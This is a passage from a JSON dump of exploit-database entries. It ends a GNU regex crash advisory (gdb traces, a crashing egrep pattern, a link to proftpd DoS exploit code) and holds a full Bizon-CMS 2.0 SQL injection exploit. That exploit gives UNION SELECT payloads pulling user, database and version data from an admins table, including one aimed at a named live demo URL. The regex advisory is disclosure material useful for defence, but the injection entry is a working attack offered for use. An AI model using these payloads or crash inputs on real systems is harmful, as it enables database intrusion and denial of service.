2*SIZE_SZ))\r\n \r\nmem variable (mem=0x7ffff720a010)\r\n \r\n(gdb) x/x 0x7ffff720a010\r\n0x7ffff720a010: 0x00\r\n \r\nor\r\n \r\n(gdb) x/x 0x7ffff720a010\r\n0x7ffff720a010: Cannot access memory at address 0x7ffff720a010\r\n \r\n(gdb) x/i $rip\r\n=> 0x7ffff78d2c2d <__libc_free+29>: mov -0x8(%rdi),%rsi\r\n(gdb) x/i 
$rdi\r\n0x7ffff7ed3010: Cannot access memory at address 0x7ffff7ed3010\r\n(gdb) x/i $rsi\r\n0x0: Cannot access memory at address 0x0\r\n \r\nor check this\r\n \r\n(gdb) r \"/(.*+++++++++++++++++++(\\w+))/im\" cx\r\nThe program being debugged has been started already.\r\nStart it from the beginning? (y or n) y\r\n \r\nStarting program: /bin/egrep \"/(.*+++++++++++++++++++(\\w+))/im\" cx\r\n \r\nProgram received signal SIGSEGV, Segmentation fault.\r\nparse_dup_op (regexp=0x7fffffffdf70, preg=<value optimized out>,\r\ntoken=0x7fffffffe010, syntax=<value optimized out>,\r\nnest=<value optimized out>, err=<value optimized out>) at\r\nregcomp.c:2547\r\n2547 if (elem->token.type == SUBEXP)\r\n(gdb) x/i $rip\r\n=> 0x7ffff7922644 <parse_expression+756>: cmpb $0x11,0x30(%r15)\r\n(gdb) x/i $r15\r\n0x0: Cannot access memory at address 0x0\r\n \r\nrax 0x0 0\r\nrbx 0x61f0c0 6418624\r\nrcx 0xffffffffffffffa8 -88\r\nrdx 0x0 0\r\nrsi 0x61f0c0 6418624\r\nrdi 0x0 0\r\nrbp 0x7fffffffe010 0x7fffffffe010\r\nrsp 0x7fffffffdb70 0x7fffffffdb70\r\nr8 0xffffffff 4294967295\r\nr9 0x0 0\r\nr10 0x4022 16418\r\nr11 0x246 582\r\nr12 0x7fffffffdf70 140737488346992\r\nr13 0x4730ae8 74648296\r\nr14 0xffffffff 4294967295\r\nr15 0x0 0\r\nrip 0x7ffff7922644 0x7ffff7922644 <parse_expression+756>\r\n \r\n#0 parse_dup_op (regexp=0x7fffffffdf70, preg=<value optimized out>,\r\ntoken=0x7fffffffe010, syntax=<value optimized out>,\r\nnest=<value optimized out>, err=<value optimized out>) at\r\nregcomp.c:2547\r\n#1 parse_expression (regexp=0x7fffffffdf70, preg=<value optimized out>,\r\ntoken=0x7fffffffe010, syntax=<value optimized out>,\r\nnest=<value optimized out>, err=<value optimized out>) at\r\nregcomp.c:2390\r\n#2 0x00007ffff792387e in parse_branch (regexp=0x0, preg=0x61f0c0,\r\ntoken=0x0,\r\nsyntax=18446744073709551528, nest=-1, err=0x0) at regcomp.c:2163\r\n#3 parse_reg_exp (regexp=0x0, preg=0x61f0c0, token=0x0,\r\nsyntax=18446744073709551528, nest=-1, err=0x0) at regcomp.c:2122\r\n \r\n \r\nif (BE 
(start > 0, 0))\r\n{\r\ntree = elem;\r\nfor (i = 2; i <= start; ++i)\r\n{\r\nelem = duplicate_tree (elem, dfa);\r\ntree = create_tree (dfa, tree, elem, CONCAT);\r\nif (BE (elem == NULL || tree == NULL, 0))\r\ngoto parse_dup_op_espace;\r\n}\r\n \r\nif (start == end)\r\nreturn tree;\r\n \r\n/* Duplicate ELEM before it is marked optional. */\r\nelem = duplicate_tree (elem, dfa);\r\nold_tree = tree;\r\n}\r\nelse\r\nold_tree = NULL;\r\n \r\nif (elem->token.type == SUBEXP) <=CRASH HERE\r\n \r\nThese vulnerabilities are not really dangerous. However, there is the\r\npossibility to use the DoS attack. An example might be an exploit for\r\nproftpd. Option 3 allows to exhaustion avaliable memory. In my opinion, the\r\nGNU should fix the problem.\r\n \r\n \r\n- --- 4. Exploit ---\r\nproftpd/linux:\r\nhttp://cxib.net/stuff/proftpd.gnu.c\r\n \r\n \r\n- --- 5. Greets ---\r\nChristos Zoulas, US-CERT, sp3x, Infospec\r\n \r\n \r\n- --- 6. Contact ---\r\nAuthor: SecurityReason.com [ Maksymilian Arciemowicz ]\r\n \r\nEmail:\r\n- - cxib {a\\./t] securityreason [d=t} com\r\n \r\nGPG:\r\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n \r\nhttp://securityreason.com/\r\nhttp://cxib.net/\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n 
\r\niQIcBAEBAgAGBQJNJk7rAAoJEIO8+dzW5bUwQ/YP/1G4nXltaUdMrdoUu39DM+WJ\r\nc3f+klSObS/1cDmzBOUte8ddiDdAVbU5yUvjkXkjWwMmxyPregxQxF85iUQ19UIP\r\nPekvo5iuI2Uh5hpWQiTxxHiTqEsGeP9XzKz9uLxQPijicD6vjovg8MkS9xEdg6ID\r\nQ1KW+7tlWY7xgGXTqZux9Y4CsMXqIaWhZlIPJjXDIEipe6HzsKZ0UmRPGEuJGSOh\r\n0tX8Om6PenFk8XOQSp20HMbK/W2qpc1hPAJ3/mrFO+uPF+8scpw413uhjwiSXOUj\r\nHUWE/iioFHRuX9eb2mwDuPKNe32OgLPRpcz1nITQVrOXTyfnwUtPrQeRu6h8Dpv7\r\nRGQtD2GdKknDpkfbUcw0/EHMSbWaJdOWZfFdDAl+rEhS8AwPNK2NJb+7LJ6AQmsM\r\nVCrJPP5eM1XM9jsQT9tvhyOunvw/HMoH/k+GP34p+FiKDIYI1LF3Gxj/w53gUK3F\r\nnYLzmoahnqC4WdfUfZizf24PXmH+385JoStrpC4Emn1kuFrM9i/eXQ3xI9My0OXJ\r\nPFHmVCFx/4iXSi/YNcShZellwi60kFe2OvfJ8BYtG15H+xr0djznLhMqbr2YMisJ\r\n066WWpfe1hTTJezLjbM8Sa9NnufXnEV+jWUocQ+dsSa2Tecn8DrsGor0Yd6UR6in\r\ns6+OIVFddtIZrQ6dw+Kk\r\n=kcIG\r\n-----END PGP SIGNATURE-----\r\n\r\n\n\n# 0day.today [2018-03-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/15419"}, {"lastseen": "2018-02-06T03:18:13", "references": [], "description": "Exploit for unknown platform in category web applications", "edition": 2, "reporter": "Mr.SQL", "published": "2008-06-17T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "zdt", "title": "Bizon-CMS 2.0 (index.php Id) Remote SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": [], "modified": "2008-06-17T00:00:00", "id": "1337DAY-ID-3199", "href": "https://0day.today/exploit/description/3199", "sourceData": "===============================================================\r\nBizon-CMS 2.0 (index.php Id) Remote SQL Injection Vulnerability\r\n===============================================================\r\n\r\n\r\n\r\n\r\n#########################################################################\r\n#################### Viva IslaM Viva IslaM ##############################\r\n##\r\n## Remote SQL Injection Vulnerability\r\n##\r\n## Bizon-CMS V2.0 ( index.php Page 
)\r\n##\r\n#########################################################################\r\n########################\r\n########################\r\n##\r\n## Script : Bizon-CMS\r\n##\r\n## version : V2.0\r\n##\r\n## site : www.bizon-soft.com\r\n##\r\n########################\r\n########################\r\n##\r\n## -(:: SQL ::)-\r\n##\r\n## www.site.com/photo/\r\n## index.php?Page=ShowPicture&Id=-756+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()),8,9,10+from+admins/*\r\n##\r\n## -(:: L!VE DEMO ::)-\r\n##\r\n## http://www.bizon-soft.com/bizon-cms-demo/photo/index.php?Page=ShowPicture&Id=-756+union+select+1,2,3,4,5,6,@@version,current_user,database(),10+from+admins/*\r\n##\r\n#######################\r\n#######################\r\n\r\n######################################################################################################\r\n######################################################################################################\r\n -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-\r\n :: HaCkEr-EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MusliMs HaCkErs ::\r\n######################################################################################################\r\n######################################################################################################\r\n\r\n\r\n\n# 0day.today [2018-02-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/3199"}]}}